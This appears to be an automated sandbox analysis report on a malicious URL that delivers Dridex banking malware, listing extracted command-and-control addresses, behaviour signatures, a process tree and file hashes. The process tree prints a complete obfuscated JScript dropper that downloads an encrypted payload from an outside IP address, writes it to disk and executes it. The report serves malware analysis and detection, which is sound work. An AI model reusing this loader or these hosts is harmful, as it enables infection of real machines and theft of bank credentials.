Analysis
-
max time kernel
135s -
max time network
146s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
23-03-2021 00:03
General
-
Target
https://myallexit.xyz/promoexit
-
Sample
210323-dnkdmbrvm2
Malware Config
Extracted
dridex
10111
188.165.17.91:8443
81.0.236.90:6601
Signatures
-
Dridex
Dridex(known as Bugat/Cridex) is a form of malware that specializes in stealing bank credentials.
-
CryptOne packer 2 IoCs
Detects CryptOne packer defined in NCC blogpost.
-
Dridex Loader 2 IoCs
Detects Dridex both x86 and x64 loader in memory.
-
Blocklisted process makes network request 1 IoCs
-
Executes dropped EXE 1 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 1 TTPs 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies Internet Explorer settings 1 TTPs 40 IoCs
-
Suspicious use of FindShellTrayWindow 1 IoCs
-
Suspicious use of SetWindowsHookEx 6 IoCs
-
Suspicious use of WriteProcessMemory 15 IoCs
Processes
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://myallexit.xyz/promoexit1⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4808 CREDAT:82945 /prefetch:22⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd.exe /q /c cd /d "%tmp%" && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y=Q;y["set"+"Proxy"](n);y.open("GET",k(1),1);y.Option(n)=k(2);y.send();y/*XASX1ASXASS*/["Wait"+"ForResponse"]();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e["cha"+"rCodeAt"](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join("")};try{var u=WScript.Echo(),o="Object",A=Math,a=Function("b","return WScript.Create"+o+"(b)");P=(""+WScript).split(" ")[1],M="indexOf",q=a(P+"ing.FileSystem"+o),m=WScript.Arguments,e="WinHTTP",Z="cmd",Q=a("WinH"+"ttp.WinHttpRequest.5.1"),j=a("W"+P+".Shell"),s=a("ADODB.Stream"),x=O(8)+".",p="exe",n=0,K=WScript[P+"FullName"],E="."+p;Y="Type";s[Y]=2;s.Charset="iso-8859-1";s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]("PE\x00\x00"));s.WriteText(v);if(32-1^<d){var z=1;x+="dll"}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x="regsvr"+32+E+" /s "+x);j.run(Z+E+" /c "+x,0)}catch(xXASXASSAA){};q.Deletefile(K);>3.tMp && stArt wsCripT //B //E:JScript 3.tMp "cvbdfg" "http://45.138.26.97/?MjI3MjQw&nTRrW&s2ht4=Yn6rSCJ2vfzSj2bCIFxj38V7dSTvSgfBOLq1Ubge-jgeELgYOn8xZC1lE87eqzkWNzVafsJOL-UeOZgkW-5WREbIy3F3xzbJFdM0klhWF6jBUxekdVgsU5w4Qn_jPRaLJqRZ0B0ZhVVnNfJ1ypR7BBCPoNTNwsfO-RDp2q-2T8rd3n5Qd&oa1n4=x3rQcvWfaRuPCYjEM_jdTaRGP0zYHliPxYq&NnBMNjA0Mg==" "2"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\wscript.exewsCripT //B //E:JScript 3.tMp "cvbdfg" "http://45.138.26.97/?MjI3MjQw&nTRrW&s2ht4=Yn6rSCJ2vfzSj2bCIFxj38V7dSTvSgfBOLq1Ubge-jgeELgYOn8xZC1lE87eqzkWNzVafsJOL-UeOZgkW-5WREbIy3F3xzbJFdM0klhWF6jBUxekdVgsU5w4Qn_jPRaLJqRZ0B0ZhVVnNfJ1ypR7BBCPoNTNwsfO-RDp2q-2T8rd3n5Qd&oa1n4=x3rQcvWfaRuPCYjEM_jdTaRGP0zYHliPxYq&NnBMNjA0Mg==" "2"4⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c g52w7.exe5⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\g52w7.exeg52w7.exe6⤵
- Executes dropped EXE
- Checks whether UAC is enabled
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776MD5
faaba18d915845a4197f76aeaebe341c
SHA157c6fea245d86a0a5625f0cf41f643e12ddd3025
SHA25671d9635a70526bbaf70924d5c168b0bf66659948af799536c83679cc723e39b2
SHA512811e2495051f20fde19ac11bd8cc32a3e6ffb216f7f68e08ca6868a2ff7ed238d12006482247897252662c7f78bddcef0fbfa9bfdad695e5f49c131d6ddeae0e
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776MD5
ac11cd4c71f0ab7a352ea67ee6cb2696
SHA1656934838466f011f436dbaf3cba4ab61d4eee96
SHA256870563ac3b97652ad666ab3f1435393043b279be7abd664172f8df51314472ed
SHA51234c967e9c8ff408f9eff7fa7d43b5f623c071dd4c162ea48db339c2ece077627826efc1d1aac3109e76d6d7c14d44bcd4e2aa0a2d0bc1492402ea7796c1defc2
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\1LTDIZ32.cookieMD5
7a92c3311741e12d2d8486a53747b43d
SHA1040d75cba19dcf5c54664e493c6fae84870a1f17
SHA256b22a3a5a3319facf7b0d3b1cd55336136baba7df05d9b7f8c5883dec8bb10ce3
SHA51250b2b4eb53690993c89cf1bb38693aa25b7b9218fb0cc6b235b4b454d09e16f0c630c791f59729ad3f87359c7c809e11053d25a6e8e1fb0c31d2c7811c0d8457
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\E4RKOR9R.cookieMD5
ba1fec0238750980e2ea3e01171888e7
SHA110060b153c6931ecc75130e509180ea4a088364e
SHA25687e2a23da4c9ee1322f1cee93b8d4aa31ea4294cd6ae374e8acf821daf5c2f89
SHA512ca63dd208d584a0535ea878168ed08d7956d6983a31d3e342ee957ebb0a4a498ee43123a2e9d3df9dc58a2bca20e157e7f9f8814ef4f4f7a8f5b7d7bc6e85cf9
-
C:\Users\Admin\AppData\Local\Temp\3.tMpMD5
60fc00422b399db85f87d41b8328976d
SHA1bb85034acad8025f97e5bb236443debaf8926e4b
SHA256c38eb3965155b143c8d72bf219ec6dd985a106ce0776c272470b0019e74fb690
SHA51216fa1a3c187500b5c3867fa05752428496273b73c2960c54d2e34e4833a057392c1f5469c8824fdc3d29c9ece2e65189ee281638ccaae941437a259192591151
-
C:\Users\Admin\AppData\Local\Temp\g52w7.exeMD5
63efd90cdf3b9cebab6d80b7ec371ef9
SHA1b8bb0ca0bd6d78081070bd1b6df64fbea64b2b18
SHA2568cf2f817709f1f490190f4cd6d242320da96a88774dbda75c1c62d45f442a886
SHA5129ab605e5ed05df23e2b6aa6175646f75a5de68bcb4a4dfe075cf6382728b73e30689ece99d27e3bffcb82fa1bc15db5098d7d990d7b58602fb9ed28bdfcfda58
-
C:\Users\Admin\AppData\Local\Temp\g52w7.exeMD5
63efd90cdf3b9cebab6d80b7ec371ef9
SHA1b8bb0ca0bd6d78081070bd1b6df64fbea64b2b18
SHA2568cf2f817709f1f490190f4cd6d242320da96a88774dbda75c1c62d45f442a886
SHA5129ab605e5ed05df23e2b6aa6175646f75a5de68bcb4a4dfe075cf6382728b73e30689ece99d27e3bffcb82fa1bc15db5098d7d990d7b58602fb9ed28bdfcfda58
-
memory/452-4-0x0000000000000000-mapping.dmp
-
memory/1420-6-0x0000000000000000-mapping.dmp
-
memory/1696-10-0x0000000000400000-0x000000000043D000-memory.dmpFilesize
244KB
-
memory/1696-12-0x0000000000400000-0x000000000043D000-memory.dmpFilesize
244KB
-
memory/1696-11-0x0000000002040000-0x000000000207C000-memory.dmpFilesize
240KB
-
memory/1696-7-0x0000000000000000-mapping.dmp
-
memory/3672-2-0x0000000000000000-mapping.dmp
-
memory/4272-3-0x0000000000000000-mapping.dmp